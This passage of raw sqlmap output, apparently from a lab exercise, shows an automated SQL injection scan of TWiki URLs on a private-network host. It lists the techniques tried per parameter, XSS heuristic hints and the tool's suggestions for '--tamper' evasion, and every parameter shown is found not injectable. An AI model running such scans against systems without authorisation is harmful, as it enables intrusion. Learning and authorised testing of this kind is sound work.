[18:58:41] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[18:58:41] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:58:42] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[18:58:42] [INFO] testing 'MySQL inline queries' | |
[18:58:42] [INFO] testing 'PostgreSQL inline queries' | |
[18:58:42] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:58:42] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:58:43] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[18:58:43] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[18:58:44] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:58:44] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:58:45] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:58:45] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:58:46] [INFO] testing 'Oracle AND time-based blind' | |
[18:58:46] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[18:58:46] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[18:58:53] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[18:59:00] [WARNING] GET parameter 'rev' is not injectable | |
[18:59:00] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
[18:59:00] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/rdiff/TWiki/TWikiHistory?rev1=1.9&rev2=1.8' | |
[18:59:00] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/TWiki/TWikiHistory?rev=1.8' | |
[18:59:00] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/rdiff/TWiki/TWikiHistory?rev1=1.8&rev2=1.7' | |
[18:59:00] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/TWiki/TWikiHistory?rev=1.7' | |
URL 75: | |
GET http://192.168.1.113:80/twiki/bin/oops/TWiki/TWikiHistory?template=oopsrev¶m1=1.10 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[18:59:00] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/oops/TWiki/TWikiHistory?template=oopsrev¶m1=1.10' | |
[18:59:00] [INFO] testing connection to the target URL | |
[18:59:00] [INFO] testing if the target URL is stable | |
[18:59:01] [INFO] target URL is stable | |
[18:59:01] [INFO] testing if GET parameter 'template' is dynamic | |
[18:59:01] [INFO] confirming that GET parameter 'template' is dynamic | |
[18:59:01] [INFO] GET parameter 'template' is dynamic | |
[18:59:01] [INFO] heuristics detected web page charset 'ascii' | |
[18:59:01] [WARNING] heuristic (basic) test shows that GET parameter 'template' might not be injectable | |
[18:59:01] [INFO] heuristic (XSS) test shows that GET parameter 'template' might be vulnerable to XSS attacks | |
[18:59:01] [INFO] testing for SQL injection on GET parameter 'template' | |
[18:59:01] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:59:01] [WARNING] reflective value(s) found and filtering out | |
[18:59:02] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:59:02] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:59:03] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[18:59:03] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[18:59:03] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:59:04] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[18:59:04] [INFO] testing 'MySQL inline queries' | |
[18:59:04] [INFO] testing 'PostgreSQL inline queries' | |
[18:59:04] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:59:04] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:59:04] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[18:59:05] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[18:59:05] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:59:05] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:59:06] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:59:06] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:59:07] [INFO] testing 'Oracle AND time-based blind' | |
[18:59:07] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[18:59:07] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[18:59:12] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[18:59:16] [WARNING] GET parameter 'template' is not injectable | |
[18:59:16] [INFO] testing if GET parameter 'param1' is dynamic | |
[18:59:16] [WARNING] GET parameter 'param1' does not appear dynamic | |
[18:59:16] [WARNING] heuristic (basic) test shows that GET parameter 'param1' might not be injectable | |
[18:59:16] [INFO] heuristic (XSS) test shows that GET parameter 'param1' might be vulnerable to XSS attacks | |
[18:59:16] [INFO] testing for SQL injection on GET parameter 'param1' | |
[18:59:16] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:59:17] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:59:17] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:59:18] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[18:59:18] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[18:59:19] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:59:19] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[18:59:19] [INFO] testing 'MySQL inline queries' | |
[18:59:19] [INFO] testing 'PostgreSQL inline queries' | |
[18:59:20] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:59:20] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:59:20] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[18:59:20] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[18:59:21] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:59:21] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:59:22] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:59:22] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:59:22] [INFO] testing 'Oracle AND time-based blind' | |
[18:59:23] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[18:59:28] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[18:59:34] [WARNING] GET parameter 'param1' is not injectable | |
[18:59:34] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 76: | |
GET http://192.168.1.113:80/twiki/bin/edit/TWiki/TWikiDocumentation?t=1441456817 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[18:59:34] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/edit/TWiki/TWikiDocumentation?t=1441456817' | |
[18:59:34] [INFO] testing connection to the target URL | |
[18:59:34] [INFO] testing if the target URL is stable | |
[18:59:35] [INFO] target URL is stable | |
[18:59:35] [INFO] testing if GET parameter 't' is dynamic | |
[18:59:35] [WARNING] GET parameter 't' does not appear dynamic | |
[18:59:35] [WARNING] heuristic (basic) test shows that GET parameter 't' might not be injectable | |
[18:59:35] [INFO] testing for SQL injection on GET parameter 't' | |
[18:59:35] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:59:36] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:59:36] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:59:37] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[18:59:37] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[18:59:38] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:59:38] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[18:59:38] [INFO] testing 'MySQL inline queries' | |
[18:59:39] [INFO] testing 'PostgreSQL inline queries' | |
[18:59:39] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:59:39] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:59:39] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[18:59:39] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[18:59:40] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:59:40] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:59:41] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:59:41] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:59:42] [INFO] testing 'Oracle AND time-based blind' | |
[18:59:42] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[18:59:42] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[18:59:48] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[18:59:55] [WARNING] GET parameter 't' is not injectable | |
[18:59:55] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 77: | |
GET http://192.168.1.113:80/twiki/bin/search/TWiki/SearchResult?scope=text®ex=on&search=TWiki *Documentation[^A-Za-z] | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[18:59:55] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/search/TWiki/SearchResult?scope=text®ex=on&search=TWiki *Documentation[^A-Za-z]' | |
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y | |
[18:59:55] [INFO] testing connection to the target URL | |
[18:59:55] [INFO] testing if the target URL is stable | |
[18:59:56] [INFO] target URL is stable | |
[18:59:56] [INFO] testing if URI parameter '#1*' is dynamic | |
[18:59:56] [INFO] confirming that URI parameter '#1*' is dynamic | |
[18:59:56] [INFO] URI parameter '#1*' is dynamic | |
[18:59:56] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable | |
[18:59:56] [INFO] testing for SQL injection on URI parameter '#1*' | |
[18:59:56] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:59:57] [WARNING] reflective value(s) found and filtering out | |
[18:59:58] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:59:59] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:59:59] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[19:00:00] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[19:00:00] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[19:00:01] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[19:00:01] [INFO] testing 'MySQL inline queries' | |
[19:00:01] [INFO] testing 'PostgreSQL inline queries' | |
[19:00:01] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[19:00:02] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[19:00:02] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[19:00:03] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[19:00:03] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[19:00:04] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[19:00:04] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[19:00:05] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[19:00:06] [INFO] testing 'Oracle AND time-based blind' | |
[19:00:06] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[19:00:06] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[19:00:13] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[19:00:18] [WARNING] URI parameter '#1*' is not injectable | |
[19:00:18] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 78: | |
GET http://192.168.1.113:80/twiki/bin/view/TWiki/TWikiDocumentation?skin=print | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[19:00:18] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/view/TWiki/TWikiDocumentation?skin=print' | |
[19:00:18] [INFO] testing connection to the target URL | |
[19:00:21] [INFO] testing if the target URL is stable | |
[19:00:22] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on | |
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C | |
[19:00:23] [INFO] testing if GET parameter 'skin' is dynamic | |
[19:00:24] [WARNING] GET parameter 'skin' does not appear dynamic | |
[19:00:24] [INFO] heuristics detected web page charset 'ascii' | |
[19:00:24] [WARNING] heuristic (basic) test shows that GET parameter 'skin' might not be injectable | |
[19:00:26] [INFO] heuristic (XSS) test shows that GET parameter 'skin' might be vulnerable to XSS attacks | |
[19:00:26] [INFO] testing for SQL injection on GET parameter 'skin' | |
[19:00:26] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[19:00:26] [WARNING] reflective value(s) found and filtering out | |
[19:00:44] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[19:00:49] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[19:00:55] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[19:01:01] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[19:01:06] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[19:01:11] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[19:01:12] [INFO] testing 'MySQL inline queries' | |
[19:01:13] [INFO] testing 'PostgreSQL inline queries' | |
[19:01:15] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[19:01:16] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[19:01:19] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[19:01:23] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[19:01:26] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[19:01:30] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[19:01:34] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[19:01:38] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[19:01:43] [INFO] testing 'Oracle AND time-based blind' | |
[19:01:47] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[19:01:47] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[19:03:36] [WARNING] there is a possibility that the target (or WAF) is dropping 'suspicious' requests | |
[19:03:36] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request | |
[19:05:42] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[19:06:50] [WARNING] GET parameter 'skin' is not injectable | |
[19:06:50] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 79: | |
GET http://192.168.1.113:80/twiki/bin/rdiff/TWiki/TWikiDocumentation?rev1=1.44&rev2=1.43 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[19:06:50] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/rdiff/TWiki/TWikiDocumentation?rev1=1.44&rev2=1.43' | |
[19:06:50] [INFO] testing connection to the target URL | |
[19:06:50] [INFO] testing if the target URL is stable | |
[19:06:51] [INFO] target URL is stable | |
[19:06:51] [INFO] testing if GET parameter 'rev1' is dynamic | |
[19:06:51] [WARNING] GET parameter 'rev1' does not appear dynamic | |
[19:06:51] [WARNING] heuristic (basic) test shows that GET parameter 'rev1' might not be injectable | |
[19:06:51] [INFO] heuristic (XSS) test shows that GET parameter 'rev1' might be vulnerable to XSS attacks | |
[19:06:51] [INFO] testing for SQL injection on GET parameter 'rev1' | |
[19:06:51] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[19:06:52] [WARNING] reflective value(s) found and filtering out | |
[19:06:53] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[19:06:53] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[19:06:54] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[19:06:54] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[19:06:55] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[19:06:55] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[19:06:55] [INFO] testing 'MySQL inline queries' | |
[19:06:56] [INFO] testing 'PostgreSQL inline queries' | |
[19:06:56] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[19:06:56] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[19:06:56] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[19:06:57] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[19:06:57] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[19:06:58] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[19:06:58] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[19:06:59] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[19:06:59] [INFO] testing 'Oracle AND time-based blind' | |
[19:07:00] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[19:07:00] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[19:07:07] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[19:07:15] [WARNING] GET parameter 'rev1' is not injectable | |
[19:07:15] [INFO] testing if GET parameter 'rev2' is dynamic | |
[19:07:15] [INFO] confirming that GET parameter 'rev2' is dynamic | |
[19:07:15] [INFO] GET parameter 'rev2' is dynamic | |
[19:07:15] [WARNING] heuristic (basic) test shows that GET parameter 'rev2' might not be injectable | |
[19:07:15] [INFO] heuristic (XSS) test shows that GET parameter 'rev2' might be vulnerable to XSS attacks | |
[19:07:15] [INFO] testing for SQL injection on GET parameter 'rev2' | |
[19:07:15] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[19:07:16] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[19:07:23] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[19:07:24] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[19:07:25] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[19:07:25] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[19:07:26] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[19:07:29] [INFO] testing 'MySQL inline queries' | |
[19:07:32] [INFO] testing 'PostgreSQL inline queries' | |
[19:07:35] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[19:07:38] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[19:07:38] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[19:07:39] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[19:07:39] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[19:07:40] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[19:07:40] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[19:07:41] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[19:07:42] [INFO] testing 'Oracle AND time-based blind' | |
[19:07:42] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[19:07:50] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[19:07:57] [WARNING] GET parameter 'rev2' is not injectable | |
[19:07:57] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 80: | |
GET http://192.168.1.113:80/twiki/bin/view/TWiki/TWikiDocumentation?rev=1.43 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[19:07:57] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/view/TWiki/TWikiDocumentation?rev=1.43' | |
[19:07:57] [INFO] testing connection to the target URL | |
[19:08:00] [INFO] testing if the target URL is stable | |
[19:08:01] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on | |
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C | |
[19:08:01] [INFO] testing if GET parameter 'rev' is dynamic | |
[19:08:03] [INFO] confirming that GET parameter 'rev' is dynamic | |
[19:08:04] [INFO] GET parameter 'rev' is dynamic | |
[19:08:04] [WARNING] heuristic (basic) test shows that GET parameter 'rev' might not be injectable | |
[19:08:04] [INFO] heuristic (XSS) test shows that GET parameter 'rev' might be vulnerable to XSS attacks | |
[19:08:04] [INFO] testing for SQL injection on GET parameter 'rev' | |
[19:08:04] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[19:08:04] [WARNING] reflective value(s) found and filtering out | |
[19:08:14] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[19:08:15] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[19:08:15] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[19:08:16] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[19:08:16] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[19:08:17] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[19:08:17] [INFO] testing 'MySQL inline queries' | |
[19:08:17] [INFO] testing 'PostgreSQL inline queries' | |
[19:08:17] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[19:08:18] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[19:08:18] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[19:08:19] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[19:08:19] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[19:08:19] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[19:08:20] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[19:08:21] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[19:08:23] [INFO] testing 'Oracle AND time-based blind' | |
[19:08:24] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[19:08:24] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[19:09:02] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[19:09:40] [WARNING] GET parameter 'rev' is not injectable | |
[19:09:40] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
[19:09:40] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/rdiff/TWiki/TWikiDocumentation?rev1=1.43&rev2=1.42' | |
[19:09:40] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/TWiki/TWikiDocumentation?rev=1.42' | |
URL 81: | |
GET http://192.168.1.113:80/twiki/bin/oops/TWiki/TWikiDocumentation?template=oopsmore¶m1=1.44¶m2=1.44 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[19:09:40] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/oops/TWiki/TWikiDocumentation?template=oopsmore¶m1=1.44¶m2=1.44' | |
[19:09:40] [INFO] testing connection to the target URL | |
[19:09:40] [INFO] testing if the target URL is stable | |
[19:09:41] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on | |
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C | |
[19:09:41] [INFO] testing if GET parameter 'template' is dynamic | |
[19:09:41] [INFO] confirming that GET parameter 'template' is dynamic | |
[19:09:41] [INFO] GET parameter 'template' is dynamic | |
[19:09:41] [INFO] heuristics detected web page charset 'ascii' | |
[19:09:41] [WARNING] heuristic (basic) test shows that GET parameter 'template' might not be injectable | |
[19:09:41] [INFO] heuristic (XSS) test shows that GET parameter 'template' might be vulnerable to XSS attacks | |
[19:09:41] [INFO] testing for SQL injection on GET parameter 'template' | |
[19:09:41] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[19:09:41] [WARNING] reflective value(s) found and filtering out | |
[19:09:42] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[19:09:42] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[19:09:43] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[19:09:43] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[19:09:44] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[19:09:44] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[19:09:44] [INFO] testing 'MySQL inline queries' | |
[19:09:44] [INFO] testing 'PostgreSQL inline queries' | |
[19:09:44] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[19:09:45] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[19:09:45] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[19:09:45] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[19:09:46] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[19:09:46] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[19:09:47] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[19:09:47] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[19:09:48] [INFO] testing 'Oracle AND time-based blind' | |
[19:09:48] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[19:09:48] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[19:09:53] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[19:09:57] [WARNING] GET parameter 'template' is not injectable | |
[19:09:57] [INFO] testing if GET parameter 'param1' is dynamic | |
[19:09:57] [WARNING] GET parameter 'param1' does not appear dynamic | |
